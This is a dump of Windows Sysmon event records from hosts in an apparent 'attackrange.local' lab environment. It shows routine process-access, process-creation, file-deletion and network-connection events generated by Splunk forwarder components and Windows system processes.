07:56:36.681{2FDD8D40-B3B4-615A-7101-00000000FD01}2616524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:36.386{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082524Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3B4-615A-7101-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082523Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082522Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082521Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082520Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082519Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082518Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082517Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082516Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082515Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082514Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3B4-615A-7101-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082513Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.493{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3B4-615A-7101-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082512Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:36.494{2FDD8D40-B3B4-615A-7101-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:37.995{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCAC5096D1F720B11EB5CFEED5D9142C,SHA256=0AF37FF455813D0DA47CAC4FE7A8F17882211C166B8BBD766A818D9A94FEE59E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082528Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:37.759{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E00D9CE9D6E1790A1718E5AF62F12BA0,SHA256=665F681754AD04371D3FEE4C5515B245094AC467FAB987671194752A74969DAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082527Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:37.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E36270FF2308DB044864AFF763A51A39,SHA256=5C16708F775FEA9554F3B2431F4B0290DB3979355D57677E13191787B3752EB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082529Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:38.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFE4C22F6F35276299C6C90F0E0CB92F,SHA256=6EFA41109766C78001D68C03B96B94D5C07D3F118D82FB6329474C802310FC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082531Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:39.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97C6E45D965ED15C35A4D3CF1A003EBD,SHA256=E9BA912ED3B83093B9E37C7B0A87E97EEF51E65C9613DE6C3688F70ECF539B74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:37.341{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51709-false10.0.1.12-8000- 23542300x8000000000000000104618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:39.011{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422C203D4C505EA9835C7102DBCA9356,SHA256=3A6CF318C5670C170C102A46B4BFAD5D11D9119204876211C3757BC78A95D3FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082530Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:37.719{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50099-false10.0.1.12-8000- 23542300x800000000000000082532Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:40.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01C62CB792BE8C1AB1704CB8B3706E7C,SHA256=5953C48BA91E44F116946095410449ECCB96098A1E0B8099B7E8684DDE10EB77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:40.011{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC9CC066ADAC2801368EB1996748280,SHA256=21DC6FBCE7346A3D65BE3F45D96D662685B8E602410130B133738B761E7240EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082533Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:41.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA50A2E0928F5A8D3A636C619DA5202B,SHA256=07DA43E2DE70B04DCF13654BD127746AB3F11FC4F79A6A6F8857A186D70E598A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:41.464{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BA0CAFEC7A608FCC29B08EFB163F4AB,SHA256=32CF98FC3DBADABECFBC91DE94CDD31100DA693528BDB31E67405DE83294F363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:41.464{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF69A1F8F0A10DD2620711760E341163,SHA256=1B43FD62EB3E6B26EE525D7FFB69A4FFECCA587DC5DCA53BB16F545B3DAAB915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:41.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D42913ECD6F464ECE0464B369525428D,SHA256=07ED97A5568D28DC648BC421433A0F8EB5186E5000DDF0CE357A78FA05DF7495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082534Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:42.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B8FC67FA4C4A0DBAA94DBAEEEC1ECE1,SHA256=F5A77E32E7FF5284E4FACE81106E8BBAE807B3C18339F1A3DCCAAE723337B3D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:42.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCC49B9AAE583F7FBF21669633BB066,SHA256=95380D57CB47EEE119F0B743CDCBA0936658B04B3AA95714ECE1747DFA0A9D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082535Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:43.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC126FA7FD19F8618C622D87109C2BBA,SHA256=4898A44D2CA4BE4FEDC4BE1B08F9C5CE0DBC41D754153113E42944F5D16624B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:43.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF0677249BA38D62B32274A16E04C99F,SHA256=1E2F0AB937A4354F9CB2C0637C83E46BB7A8F736C93659D3C84600CD0447DCCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082536Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:44.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A97CAC72A2D795472866FBFD62CB126,SHA256=0B626ECCF26CD070721B8755A56D5AE60D5AAA7C52EC81E6A0EBE5A45B99A740,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:43.279{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51710-false10.0.1.12-8000- 23542300x8000000000000000104626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:44.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27DFC5FAEBB014BD560219A3C8CDE0B0,SHA256=889A2429D3230B39708F361BDE67324A4F2BF421960AC64B700B1241DE945164,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082537Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:45.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D058FD07C44A986C4D6E0BF87EE1A11C,SHA256=04B2AFDC2D4C2BDEDD5DE09F93EDDF74EA871434F18C3B0DBDE5FAA9AA00EA9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:45.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E8919FB94B40AF84F9EC1C38437A8A,SHA256=9FA0A83A2A30044D68F988F21B98291ADCC75ADD654F289F38AA0018FB454210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082539Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:46.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 